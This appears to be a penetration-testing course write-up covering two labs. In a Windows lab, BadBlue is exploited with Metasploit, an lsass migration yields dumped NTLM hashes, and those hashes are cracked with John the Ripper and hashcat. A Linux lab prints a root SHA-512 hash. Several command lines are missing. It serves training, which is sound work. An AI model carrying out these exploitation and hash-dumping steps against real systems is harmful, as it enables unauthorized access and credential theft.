🔬Cracking Hashes
Lab 1 - Windows
Target IP:
10.2.24.37NTLM Hashes dumping and cracking
Enumeration & Exploitation
nmap -sV -p 80 10.2.24.3780/tcp open http BadBlue httpd 2.7service postgresql start && msfconsole -qsearch badblue
use exploit/windows/http/badblue_passthru
options
setg RHOSTS 10.2.24.37
runsysinfo
Computer : WIN-OMCNBKR66MN
OS : Windows 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
getuid
Server username: WIN-OMCNBKR66MN\Administrator
get privs
Enabled Process Privileges
==========================
Name
----
SeBackupPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeCreatePagefilePrivilege
SeCreateSymbolicLinkPrivilege
SeDebugPrivilege
SeImpersonatePrivilege
SeIncreaseBasePriorityPrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeLoadDriverPrivilege
SeManageVolumePrivilege
SeProfileSingleProcessPrivilege
SeRemoteShutdownPrivilege
SeRestorePrivilege
SeSecurityPrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeTakeOwnershipPrivilege
SeTimeZonePrivilege
SeUndockPrivilegeWith the
AdministratorMeterpreter session, privilege escalation is not necessary.Migrate to the
lsassprocess
Dumping Hashes
❗ In order to set up persistence, administrative privileges are required.
Open a new tab and create a
.txtfile with the dumped hashes. Paste theAdministratorandbobhashes
Cracking Hashes
Metasploit auxiliary/analyze/crack_windows module can be used to brute-force the hashes.
JohnTheRipper
In this case John The Ripper will be used as an example
john - Open Source password security auditing and password recovery tool available for many operating systems

Use the
rockyou.txtwordlist instead
Hashcat
hashcat - Open Source advanced password recovery utility, supporting five unique modes of attack for over 300 highly-optimized hashing algorithms
Crack NTLM hashes with
hashcatbrute-force

Try RDP login
Lab 2 - Linux
Target IP:
192.22.107.3Password Hashes dumping and cracking
Same lab as the 🔬Hashes Dumping lab
Enumeration & Exploitation
Dumping Hashes
📌
root:$6$sgewtGbw$ihhoUYASuXTh7Dmw0adpC7a3fBGkf9hkOQCffBQRMIF8/0w6g/Mh4jMWJ0yEFiZyqVQhZ4.vuS8XOyq.hLQBb.
$6= the hashing algorithm is SHA-512

An MSF module can be used for hash dumping

Exit
MSFconsole
Cracking Hashes
Metasploit auxiliary/analyze/crack_linux module can be used to brute-force the hashes. Check the technique in the same 🔬lab environment.
JohnTheRipper
In this case John The Ripper will be used as an example

Hashcat

Last updated
Was this helpful?